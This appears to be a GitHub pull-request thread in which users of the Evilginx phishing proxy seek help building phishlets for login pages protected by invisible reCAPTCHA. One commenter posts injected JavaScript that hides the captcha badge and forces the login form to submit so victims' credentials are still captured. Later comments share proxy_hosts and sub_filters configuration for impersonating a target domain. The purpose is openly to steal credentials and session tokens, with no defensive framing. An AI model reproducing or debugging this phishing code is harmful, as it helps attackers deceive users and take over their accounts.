### PR TITLE
How to proxy recaptcha?

### PR DESCRIPTION
**Pull request by winterwyvern**
Can you help with it? Phishlet included

### CODE REVIEW

**Comment by An0nUD4Y** [comment]
Same issue with me as well.

I have Few Ways to Only Capture The Credentials for those site with google invisible recaptcha enabled but session token will not be captured.
I was only able to capture the credentials and got captcha failure after login attempt.

Many sites has google invisible recaptcha enabled , Which make it quite tough to create phishing templates for them and even capturing the credentials as failed captcha blocks the form submit attempts.

* Capturing Credentials Even After Failing Google invisible Recaptcha
Failed recaptcha also blocks the form submission , As a result evilginx do not captures the credentials...
It can be bypassed with a javascript injection.
`document.body.innerHTML = document.body.innerHTML.replace(/onclick="$('.alert-danger').hide(); $(this).button('loading');"/g , 'onclick="document.getElementById("loginPageForm").submit();"');`
Where loginPageForm is the Form Id .

* Hide The Failed Captcha Alert from Users.
This script will simply hide the failed invisible google recaptcha v2 from user.
`document.querySelector(".grecaptcha-badge").style.visibility = "hidden";`

** Complete Script to be putted can be..
`function recaptcha(){
                var f0 = document.querySelector(".grecaptcha-badge").style.visibility = "hidden";                              
                var f1 = document.body.innerHTML = document.body.innerHTML.replace(/onclick="$('.alert-danger').hide(); $(this).button('loading');"/g , 'onclick="document.getElementById("loginPageForm").submit();"');
            return;
            }
            setTimeout(function(){recaptcha();}, 1500);`



PLEASE SHARE IF ANYONE HAVE A PROPER SOLUTION FOR THIS ISSUE.

**Comment by An0nUD4Y** [comment]
Try Some Of the Fixed Phishlets.
https://github.com/An0nUD4Y/Evilginx2-Phishlets

**Comment by winterwyvern** [comment]
> 
> 
> Try Some Of the Fixed Phishlets.
> https://github.com/An0nUD4Y/Evilginx2-Phishlets

Hey, thx for attention. Can you help me once again? I looking forsolution of this problem with urls replacement.

By default Evilginx replace all match domain names.
I have third-party URLs like this: https://iliusstu-a.akamaihd.net/**NATIVEdomain.com**/hpv-opi-full/bundle-d835afbc479ae16.js And I have 404 URLs after proxy like this https://iliusstu-a.akamaihd.net/**PHISHdomain.com**/hpv-opi-full/bundle-d835afbc479ae16.js

Is it possible to leave URLs without changes?

Thx

**Comment by An0nUD4Y** [comment]
You have to use sub_filters properly for that...

**Comment by winterwyvern** [comment]
> 
> 
> You have to use sub_filters properly for that...

Of course, I understand and I try. May be I'm not exactly explain: I try again.


By default Evilginx replace all match domain names.

I have proxy_hosts:
  - {phish_sub: '', orig_sub: 'NATIVEsubdomain', domain: ''NATIVEdomain.com', session: true, is_landing: true}

I have third-party URLs like this: https://iliusstu-a.akamaihd.net/**NATIVEsubdomain.NATIVEdomain.com**/hpv-opi-full/bundle-d835afbc479ae16.js 

I try to change it like this:

sub_filters:
  - {triggers_on: 'NATIVEsubdomain.NATIVEdomain.com', orig_sub: 'NATIVEsubdomain', domain: 'NATIVEdomain.com', search: '{hostname}', replace: 'NATIVEsubdomain.NATIVEdomain.com', mimes: ['text/html', 'application/json', 'application/javascript']}

and other ways

And I have 404 URLs after proxy like this https://iliusstu-a.akamaihd.net/**PHISHdomain.com**/hpv-opi-full/bundle-d835afbc479ae16.js


I try to proxy third-party too, but in vain. Can you try and help me?

**Pull request closed without merging**
